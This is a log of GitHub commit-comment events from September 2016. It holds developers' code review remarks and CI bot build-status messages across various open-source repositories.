{"id":"4564653175","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026920,"position":9,"line":9,"path":"backend/src/main/java/ru/avito/web/ServerResponse.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:16:11Z","updated_at":"2016-09-14T21:16:11Z","body":"Этот класс надо переделать основательно, я там писал выше, про то что это херня на самом деле, то как сейчас сделано, надо что бы все было одним json.\r\n"}},"created_at":"2016-09-14T21:16:11Z"}
{"id":"4564654242","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026922,"position":null,"line":null,"path":null,"commit_id":"abfcb78a056a05893f1828c1b9db13f26b2b33e3","created_at":"2016-09-14T21:16:22Z","updated_at":"2016-09-14T21:16:22Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1019)"}},"created_at":"2016-09-14T21:16:22Z"}
{"id":"4564654335","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026923,"position":null,"line":null,"path":null,"commit_id":"0b738db777038f5b64cd113e4072790f8feae1f4","created_at":"2016-09-14T21:16:23Z","updated_at":"2016-09-14T21:16:23Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1020)"}},"created_at":"2016-09-14T21:16:23Z"}
{"id":"4564655265","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github-v2"},"payload":{"comment":{"id":19026925,"position":null,"line":null,"path":null,"commit_id":"6618956b63bf2f991527b9e063e8b741e828ac6b","created_at":"2016-09-14T21:16:35Z","updated_at":"2016-09-14T21:16:35Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1025)"}},"created_at":"2016-09-14T21:16:35Z"}
{"id":"4564655657","type":"CommitCommentEvent","actor":{"login":"scott"},"repo":{"name":"mrManner/helpy"},"payload":{"comment":{"id":19026928,"position":2,"line":2,"path":"config/locales/sv.yml","commit_id":"31fe712a0474a3e162aa2ed3d7c5cf6fbf28353d","created_at":"2016-09-14T21:16:39Z","updated_at":"2016-09-14T21:16:39Z","body":"Awesome to see Swedish!"}},"created_at":"2016-09-14T21:16:39Z"}
{"id":"4564657269","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026935,"position":32,"line":32,"path":"backend/src/main/java/ru/avito/web/ServerResponse.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:16:58Z","updated_at":"2016-09-14T21:16:58Z","body":"Это лучше заменить на fluent методы. для идеи есть плагин бесплатный, для автоматической генерации fluent методов."}},"created_at":"2016-09-14T21:16:58Z"}
{"id":"4564657550","type":"CommitCommentEvent","actor":{"login":"mikey0000"},"repo":{"name":"mikey0000/device-softwinner"},"payload":{"comment":{"id":19026938,"position":19,"line":132,"path":"tulip-chiphd/tulip_chiphd_atv.mk","commit_id":"af984dfbbd33a01d75b6e0157111def5b2f37ca3","created_at":"2016-09-14T21:17:01Z","updated_at":"2016-09-14T21:17:01Z","body":"referring to this line \r\n```\r\n$(call inherit-product-if-exists, vendor/google/products/gms_5.1r4_db.mk)\r\n```"}},"created_at":"2016-09-14T21:17:01Z"}
{"id":"4564658822","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19026943,"position":1,"line":1,"path":"gradlew","commit_id":"489daf5ae2f3877960d788e487c10b669e2f4575","created_at":"2016-09-14T21:17:15Z","updated_at":"2016-09-14T21:17:15Z","body":"Remove this file"}},"created_at":"2016-09-14T21:17:15Z"}
{"id":"4564660013","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19026944,"position":1,"line":1,"path":"gradlew.bat","commit_id":"489daf5ae2f3877960d788e487c10b669e2f4575","created_at":"2016-09-14T21:17:28Z","updated_at":"2016-09-14T21:17:28Z","body":"Remove this file"}},"created_at":"2016-09-14T21:17:28Z"}
{"id":"4564661379","type":"CommitCommentEvent","actor":{"login":"hamishmack"},"repo":{"name":"leksah/leksah"},"payload":{"comment":{"id":19026947,"position":null,"line":null,"path":null,"commit_id":"ec00591ac70e82de2c76ca03767cedc667a09065","created_at":"2016-09-14T21:17:42Z","updated_at":"2016-09-14T21:17:42Z","body":"That would work"}},"created_at":"2016-09-14T21:17:42Z"}
{"id":"4564661600","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026948,"position":21,"line":21,"path":"backend/src/main/java/ru/avito/web/Stat.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:17:45Z","updated_at":"2016-09-14T21:17:45Z","body":"Это полный пиздец..."}},"created_at":"2016-09-14T21:17:45Z"}
{"id":"4564663754","type":"CommitCommentEvent","actor":{"login":"iball"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19026959,"position":null,"line":null,"path":null,"commit_id":"37fd39346bc76e99b794886b6933899fdf7bc0e7","created_at":"2016-09-14T21:18:10Z","updated_at":"2016-09-14T21:18:10Z","body":"Might want to reduce the size a bit on this so we can see the important stuff like battery level, power level, etc.\r\nAlso would be nice if we could hit the red key and \"close\" the window allowing access to the menu while listening to the chatter."}},"created_at":"2016-09-14T21:18:10Z"}
{"id":"4564665950","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026965,"position":125,"line":125,"path":"backend/src/main/java/ru/avito/web/Stat.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:18:33Z","updated_at":"2016-09-14T21:18:33Z","body":"Это все одно из самых уебищнейших мест во всем коде... у меня нет слов, это все надо выкинуть на свалку и переделать."}},"created_at":"2016-09-14T21:18:33Z"}
{"id":"4564666274","type":"CommitCommentEvent","actor":{"login":"chrisballinger"},"repo":{"name":"robbiehanson/XMPPFramework"},"payload":{"comment":{"id":19026968,"position":null,"line":null,"path":null,"commit_id":"3785ef4271c06153c222f6102bdab08d45870038","created_at":"2016-09-14T21:18:37Z","updated_at":"2016-09-14T21:18:37Z","body":"It should, there's macOS tests now"}},"created_at":"2016-09-14T21:18:37Z"}
{"id":"4564670432","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19026976,"position":8,"line":8,"path":"src/main/java/org/fundacionjala/pivotaltracker/BuildRoute.java","commit_id":"943fbd14fc6204ac546a65645d8164129d8feded","created_at":"2016-09-14T21:19:23Z","updated_at":"2016-09-14T21:19:23Z","body":"Why this constructor is public?\r\n"}},"created_at":"2016-09-14T21:19:23Z"}
{"id":"4564671609","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026977,"position":16,"line":16,"path":"backend/src/main/java/test/TestFormat.java","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:19:35Z","updated_at":"2016-09-14T21:19:35Z","body":"Че за пиздец?"}},"created_at":"2016-09-14T21:19:35Z"}
{"id":"4564673003","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19026982,"position":null,"line":null,"path":null,"commit_id":"dae2a3a7fec0df526060f325075c9d965fabcfd1","created_at":"2016-09-14T21:19:51Z","updated_at":"2016-09-14T21:19:51Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-14T21:19:51Z"}
{"id":"4564673041","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19026983,"position":11,"line":11,"path":"src/main/java/org/fundacionjala/pivotaltracker/BuildRoute.java","commit_id":"943fbd14fc6204ac546a65645d8164129d8feded","created_at":"2016-09-14T21:19:51Z","updated_at":"2016-09-14T21:19:51Z","body":"as we talked before you need to improve this method"}},"created_at":"2016-09-14T21:19:51Z"}
{"id":"4564674293","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026987,"position":5,"line":5,"path":"backend/src/main/resources/log4j.properties","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:20:08Z","updated_at":"2016-09-14T21:20:08Z","body":"Это надо настроить по нормальному, сделать ротацию файлов."}},"created_at":"2016-09-14T21:20:08Z"}
{"id":"4564674350","type":"CommitCommentEvent","actor":{"login":"udeved"},"repo":{"name":"manjaro/manjaro-tools-iso-profiles"},"payload":{"comment":{"id":19026988,"position":null,"line":null,"path":null,"commit_id":"11d7db6bfd39562489684084b85cebd727cd8b34","created_at":"2016-09-14T21:20:09Z","updated_at":"2016-09-14T21:20:09Z","body":"https://github.com/manjaro/release-plan/issues/78"}},"created_at":"2016-09-14T21:20:09Z"}
{"id":"4564675436","type":"CommitCommentEvent","actor":{"login":"MusikAnimal"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19026993,"position":11,"line":24,"path":"app/assets/javascripts/utils/course_date_utils.coffee","commit_id":"e4a7e23e9525a2771d23c8e32d5b5e63f87d929e","created_at":"2016-09-14T21:20:19Z","updated_at":"2016-09-14T21:20:19Z","body":"Shouldn't have gone in this commit, but anyway this will tell DatePicker to set the time to 23:59 by default. So for timeline_end when there is no time picker, `useEndOfDay` will keep the time at 23:59 (as they will have no way to change it). If there is a time picker (`this.props.course.use_start_and_end_times`) it will still show 23:59 until they change it... which I now realize will look a bit odd."}},"created_at":"2016-09-14T21:20:19Z"}
{"id":"4564675694","type":"CommitCommentEvent","actor":{"login":"carledriss"},"repo":{"name":"AT-01/pivotal-api-test1"},"payload":{"comment":{"id":19026994,"position":25,"line":25,"path":"src/main/java/org/fundacionjala/pivotaltracker/Connection.java","commit_id":"943fbd14fc6204ac546a65645d8164129d8feded","created_at":"2016-09-14T21:20:22Z","updated_at":"2016-09-14T21:20:22Z","body":"Remove unnecessary blank lines"}},"created_at":"2016-09-14T21:20:22Z"}
{"id":"4564677713","type":"CommitCommentEvent","actor":{"login":"vananos"},"repo":{"name":"DmitriyOK/helper"},"payload":{"comment":{"id":19026996,"position":1,"line":1,"path":"frontend/css/base.css","commit_id":"3c81ad959c55a92cf3dece93dac075599e9b48ae","created_at":"2016-09-14T21:20:45Z","updated_at":"2016-09-14T21:20:45Z","body":"Все что ниже, это тема отдельного большого разговора, уже не сегодня."}},"created_at":"2016-09-14T21:20:45Z"}
{"id":"4564677872","type":"CommitCommentEvent","actor":{"login":"Morphan1"},"repo":{"name":"BlackCoyote/dScripts"},"payload":{"comment":{"id":19026997,"position":823,"line":1194,"path":"dTowns/dTowns.yml","commit_id":"cdf65b8daad86c85e6812925c100465110ca48bf","created_at":"2016-09-14T21:20:47Z","updated_at":"2016-09-14T21:20:47Z","body":"<ef[state]>"}},"created_at":"2016-09-14T21:20:47Z"}
{"id":"4564680198","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19027006,"position":43,"line":185,"path":"components/patient-data/impl/src/test/java/org/phenotips/data/internal/controller/AbstractSimpleControllerTest.java","commit_id":"3941b4c6a5760a00b217969174a3095e405ec52d","created_at":"2016-09-14T21:21:14Z","updated_at":"2016-09-14T21:21:14Z","body":"This test is still valid as you still do getXObject(Patient.CLASS_REFERENCE)"}},"created_at":"2016-09-14T21:21:14Z"}
{"id":"4564681201","type":"CommitCommentEvent","actor":{"login":"kanreisa"},"repo":{"name":"kogosoftwarellc/express-openapi"},"payload":{"comment":{"id":19027008,"position":3,"line":227,"path":"index.d.ts","commit_id":"602ed42e9770a6250a8703e697c78d068deb1014","created_at":"2016-09-14T21:21:24Z","updated_at":"2016-09-14T21:21:24Z","body":"uh oh, this is must to be \r\n```\r\nroutes?: string | string[]\r\n```"}},"created_at":"2016-09-14T21:21:24Z"}
{"id":"4564681789","type":"CommitCommentEvent","actor":{"login":"RubenVerborgh"},"repo":{"name":"rdfhdt/hdt-cpp"},"payload":{"comment":{"id":19027010,"position":4,"line":771,"path":"hdt-lib/src/triples/BitmapTriplesIterators.cpp","commit_id":"777f8ed1baf6a9928ff08c5259fe1ea13b00104c","created_at":"2016-09-14T21:21:31Z","updated_at":"2016-09-14T21:21:31Z","body":"This broke with a test file of 2,164,071,828 triples (which is ever so slightly above the max int size 2,147,483,647)."}},"created_at":"2016-09-14T21:21:31Z"}
{"id":"4564683328","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027013,"position":null,"line":null,"path":null,"commit_id":"3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83","created_at":"2016-09-14T21:21:50Z","updated_at":"2016-09-14T21:21:50Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T21:21:50Z"}
{"id":"4564684887","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19027022,"position":48,"line":229,"path":"components/patient-data/impl/src/test/java/org/phenotips/data/internal/controller/DatesControllerTest.java","commit_id":"3941b4c6a5760a00b217969174a3095e405ec52d","created_at":"2016-09-14T21:22:09Z","updated_at":"2016-09-14T21:22:09Z","body":"..same here?"}},"created_at":"2016-09-14T21:22:09Z"}
{"id":"4564686232","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19027027,"position":60,"line":241,"path":"components/patient-data/impl/src/test/java/org/phenotips/data/internal/controller/DatesControllerTest.java","commit_id":"3941b4c6a5760a00b217969174a3095e405ec52d","created_at":"2016-09-14T21:22:21Z","updated_at":"2016-09-14T21:22:21Z","body":"this test is also valid"}},"created_at":"2016-09-14T21:22:21Z"}
{"id":"4564687867","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19027031,"position":131,"line":131,"path":"app/src/main/java/ru/komaric/birthdayreminder/adapter/RecyclerViewAdapter.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-14T21:22:38Z","updated_at":"2016-09-14T21:22:38Z","body":"Избыточен"}},"created_at":"2016-09-14T21:22:38Z"}
{"id":"4564689731","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19027034,"position":null,"line":null,"path":null,"commit_id":"1cc770522f54a8b09858fdb6d02e0b3ef91e223d","created_at":"2016-09-14T21:22:58Z","updated_at":"2016-09-14T21:22:58Z","body":"Hum that doesn't seem like a patch we'll be able to upstream. I think using --program-transform-name at configure time might do the trick though:\r\n\r\nhttps://www.gnu.org/software/automake/manual/html_node/Renaming.html"}},"created_at":"2016-09-14T21:22:58Z"}
{"id":"4564690757","type":"CommitCommentEvent","actor":{"login":"BlackCoyote"},"repo":{"name":"BlackCoyote/dScripts"},"payload":{"comment":{"id":19027038,"position":823,"line":1194,"path":"dTowns/dTowns.yml","commit_id":"cdf65b8daad86c85e6812925c100465110ca48bf","created_at":"2016-09-14T21:23:10Z","updated_at":"2016-09-14T21:23:10Z","body":"https://github.com/BlackCoyote/dScripts/commit/f77cb3417961b88876fe24f7e08d6a891f623905"}},"created_at":"2016-09-14T21:23:10Z"}
{"id":"4564691089","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19027039,"position":45,"line":185,"path":"components/patient-data/impl/src/test/java/org/phenotips/data/internal/controller/LifeStatusControllerTest.java","commit_id":"3941b4c6a5760a00b217969174a3095e405ec52d","created_at":"2016-09-14T21:23:13Z","updated_at":"2016-09-14T21:23:13Z","body":"...same here and for all other getXObject() tests I guess"}},"created_at":"2016-09-14T21:23:13Z"}
{"id":"4564693101","type":"CommitCommentEvent","actor":{"login":"mojavelinux"},"repo":{"name":"mulesoft/mulesoft-docs-site-assets"},"payload":{"comment":{"id":19027042,"position":null,"line":null,"path":null,"commit_id":"36f0a3126b07ed5b37a00f83aa8e4d726c9dfbef","created_at":"2016-09-14T21:23:33Z","updated_at":"2016-09-14T21:23:33Z","body":"Should this replace the existing file? Or should the site have two verification files? Should this new file also be used in the staging environment? (Or does the staging environment even need a verification file)?"}},"created_at":"2016-09-14T21:23:33Z"}
{"id":"4564693345","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19027043,"position":null,"line":null,"path":null,"commit_id":"4e1fdadd022ed9a1f7517b60b704c48bc30aaa75","created_at":"2016-09-14T21:23:35Z","updated_at":"2016-09-14T21:23:35Z","body":"I did something similar for https://github.com/NixOS/nixpkgs/pull/18546, there seem to be a bunch of packages that run into this because of multiple outputs."}},"created_at":"2016-09-14T21:23:35Z"}
{"id":"4564694873","type":"CommitCommentEvent","actor":{"login":"bendiken"},"repo":{"name":"rdfhdt/hdt-cpp"},"payload":{"comment":{"id":19027053,"position":4,"line":771,"path":"hdt-lib/src/triples/BitmapTriplesIterators.cpp","commit_id":"777f8ed1baf6a9928ff08c5259fe1ea13b00104c","created_at":"2016-09-14T21:23:53Z","updated_at":"2016-09-14T21:23:53Z","body":"Good to see testing on datasets of that size!"}},"created_at":"2016-09-14T21:23:53Z"}
{"id":"4564700479","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown-Client"},"payload":{"comment":{"id":19027064,"position":null,"line":null,"path":null,"commit_id":"05914194c65b8acdf6cda250d2facc075e331f3a","created_at":"2016-09-14T21:24:56Z","updated_at":"2016-09-14T21:24:56Z","body":"It was just easier to write this way; different senders are unlikely."}},"created_at":"2016-09-14T21:24:56Z"}
{"id":"4564703827","type":"CommitCommentEvent","actor":{"login":"jailson0100"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19027074,"position":100,"line":109,"path":"app/templates/home.html","commit_id":"780ddd533c22893e9d903531744c3550718b79d3","created_at":"2016-09-14T21:25:29Z","updated_at":"2016-09-14T21:25:29Z","body":"Lembrar de colocar dentro de um if, pois se o usuário não for admin vai dá erro, por que esta variável vai está null"}},"created_at":"2016-09-14T21:25:29Z"}
{"id":"4564707055","type":"CommitCommentEvent","actor":{"login":"lenapy"},"repo":{"name":"lenapy/Spider"},"payload":{"comment":{"id":19027078,"position":30,"line":35,"path":".idea/workspace.xml","commit_id":"893996df6f7dfc63ad5e45425a14dc648d7b6df5","created_at":"2016-09-14T21:26:03Z","updated_at":"2016-09-14T21:26:03Z","body":"xx"}},"created_at":"2016-09-14T21:26:03Z"}
{"id":"4564712931","type":"CommitCommentEvent","actor":{"login":"MusikAnimal"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19027097,"position":11,"line":24,"path":"app/assets/javascripts/utils/course_date_utils.coffee","commit_id":"e4a7e23e9525a2771d23c8e32d5b5e63f87d929e","created_at":"2016-09-14T21:27:10Z","updated_at":"2016-09-14T21:27:10Z","body":"Or we could put this logic in the model, maybe in an `after_save`? In that case if there is no time picker, behind the scenes the DatePicker will have the time 00:00, but when the record is saved we'll have some check saying it should be `.end_of_day`"}},"created_at":"2016-09-14T21:27:10Z"}
{"id":"4564716762","type":"CommitCommentEvent","actor":{"login":"githubfordallas"},"repo":{"name":"githubfordallas/No-Internet-Page-Recreation"},"payload":{"comment":{"id":19027109,"position":null,"line":null,"path":null,"commit_id":"d84044e2771c85a9c8f810095cf960ad8ca5ceae","created_at":"2016-09-14T21:27:54Z","updated_at":"2016-09-14T21:27:54Z","body":"good stuff"}},"created_at":"2016-09-14T21:27:54Z"}
{"id":"4564719750","type":"CommitCommentEvent","actor":{"login":"aslakhellesoy"},"repo":{"name":"cucumber/cucumber-jvm"},"payload":{"comment":{"id":19027119,"position":null,"line":null,"path":null,"commit_id":"4201a1d354a41008e9d0a07fcda3f44ba1b5b4ba","created_at":"2016-09-14T21:28:29Z","updated_at":"2016-09-14T21:28:29Z","body":"Thanks for spotting that @brasmusson! I thought they were some obsolete keys for an old version of Cucumber Pro - clearly not! I added it back in a2cd413b6f65699170671f119421ea110903ba2f"}},"created_at":"2016-09-14T21:28:29Z"}
{"id":"4564721110","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027123,"position":null,"line":null,"path":null,"commit_id":"c8eada605e94b85d6e2de4f4e2f358aa30d33e83","created_at":"2016-09-14T21:28:43Z","updated_at":"2016-09-14T21:28:43Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: OK (2307 of 2470 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c8eada605e94b85d6e2de4f4e2f358aa30d33e83-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.4%25-yellow.svg)</a> \n"}},"created_at":"2016-09-14T21:28:43Z"}
{"id":"4564721208","type":"CommitCommentEvent","actor":{"login":"Dableo"},"repo":{"name":"telic/comp152"},"payload":{"comment":{"id":19027124,"position":null,"line":null,"path":null,"commit_id":"88dc23d5ac8b5ea3567a7d1e85edd213331389c6","created_at":"2016-09-14T21:28:45Z","updated_at":"2016-09-14T21:28:45Z","body":"lol. All of this just to avoid one perfectly justified !important."}},"created_at":"2016-09-14T21:28:45Z"}
{"id":"4564722172","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027127,"position":null,"line":null,"path":null,"commit_id":"3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83","created_at":"2016-09-14T21:28:55Z","updated_at":"2016-09-14T21:28:55Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-3fb9abf55bcd4aa0a7a0b6af17fb5158ee00cc83-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-14T21:28:55Z"}
{"id":"4564722745","type":"CommitCommentEvent","actor":{"login":"marimysh"},"repo":{"name":"Komaric/BirthdayReminder"},"payload":{"comment":{"id":19027129,"position":219,"line":219,"path":"app/src/main/java/ru/komaric/birthdayreminder/activity/MainActivity.java","commit_id":"767732e9d41de6021cf5362c90ac7efecc539411","created_at":"2016-09-14T21:29:01Z","updated_at":"2016-09-14T21:29:01Z","body":"Если правильно поняла, то тут переопределение Void? это по best practices? Если нет, то кажется вполне опасным. "}},"created_at":"2016-09-14T21:29:01Z"}
{"id":"4564723521","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"EkaSe/HelloWorld"},"payload":{"comment":{"id":19027131,"position":30,"line":0,"path":"HelloWorld/Program.cs","commit_id":"ee74dadbde342337616e60bb3c78825045f02541","created_at":"2016-09-14T21:29:12Z","updated_at":"2016-09-14T21:29:12Z","body":"Красота)"}},"created_at":"2016-09-14T21:29:12Z"}
{"id":"4564729429","type":"CommitCommentEvent","actor":{"login":"webron"},"repo":{"name":"swagger-api/swagger-ui"},"payload":{"comment":{"id":19027150,"position":null,"line":null,"path":null,"commit_id":"183c67a7c5f1a8bbd7a5e6571d69319d02c71ba9","created_at":"2016-09-14T21:30:22Z","updated_at":"2016-09-14T21:30:22Z","body":"Oh wait, this was never merged."}},"created_at":"2016-09-14T21:30:22Z"}
{"id":"4564731507","type":"CommitCommentEvent","actor":{"login":"angelo2301"},"repo":{"name":"RetroPie/RetroPie-Setup"},"payload":{"comment":{"id":19027155,"position":null,"line":null,"path":null,"commit_id":"33a3a7e287c1e31df12b3374805294fda96746a6","created_at":"2016-09-14T21:30:43Z","updated_at":"2016-09-14T21:30:43Z","body":"when you go up to the website?"}},"created_at":"2016-09-14T21:30:43Z"}
{"id":"4564731826","type":"CommitCommentEvent","actor":{"login":"Zambom"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19027156,"position":100,"line":109,"path":"app/templates/home.html","commit_id":"780ddd533c22893e9d903531744c3550718b79d3","created_at":"2016-09-14T21:30:47Z","updated_at":"2016-09-14T21:30:47Z","body":"sim, eu ainda vou tratar essa parte..."}},"created_at":"2016-09-14T21:30:47Z"}
{"id":"4564732084","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027157,"position":null,"line":null,"path":null,"commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-14T21:30:50Z","updated_at":"2016-09-14T21:30:50Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T21:30:50Z"}
{"id":"4564737085","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19027167,"position":null,"line":null,"path":null,"commit_id":"7117abf5af13c25d679497cf21a7995035ec713c","created_at":"2016-09-14T21:31:48Z","updated_at":"2016-09-14T21:31:48Z","body":"os_2_0_develop_linux (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7117abf5af13c25d679497cf21a7995035ec713c-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7117abf5af13c25d679497cf21a7995035ec713c-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-14T21:31:48Z"}
{"id":"4564737564","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19027171,"position":5,"line":195,"path":"components/specificity-meter/api/src/test/java/org/phenotips/data/internal/controller/SpecificityControllerTest.java","commit_id":"9e2a07d6b1c7256321135aff498cd7cfe4d28937","created_at":"2016-09-14T21:31:54Z","updated_at":"2016-09-14T21:31:54Z","body":"nevermind, this is ok"}},"created_at":"2016-09-14T21:31:54Z"}
{"id":"4564745340","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19027197,"position":43,"line":185,"path":"components/patient-data/impl/src/test/java/org/phenotips/data/internal/controller/AbstractSimpleControllerTest.java","commit_id":"3941b4c6a5760a00b217969174a3095e405ec52d","created_at":"2016-09-14T21:33:24Z","updated_at":"2016-09-14T21:33:24Z","body":"Actually, I was wrong, this is ok, we now propagate exceptions, so need to have this test in the test for PhenotipsPatient, but here we don't need it indeed"}},"created_at":"2016-09-14T21:33:24Z"}
{"id":"4564748984","type":"CommitCommentEvent","actor":{"login":"ragesoss"},"repo":{"name":"WikiEducationFoundation/WikiEduDashboard"},"payload":{"comment":{"id":19027208,"position":11,"line":24,"path":"app/assets/javascripts/utils/course_date_utils.coffee","commit_id":"e4a7e23e9525a2771d23c8e32d5b5e63f87d929e","created_at":"2016-09-14T21:34:08Z","updated_at":"2016-09-14T21:34:08Z","body":"That's what I was thinking, although either approach would be okay with me. Definitely we don't want to change the current UI behavior for a ClassroomProgramCourse."}},"created_at":"2016-09-14T21:34:08Z"}
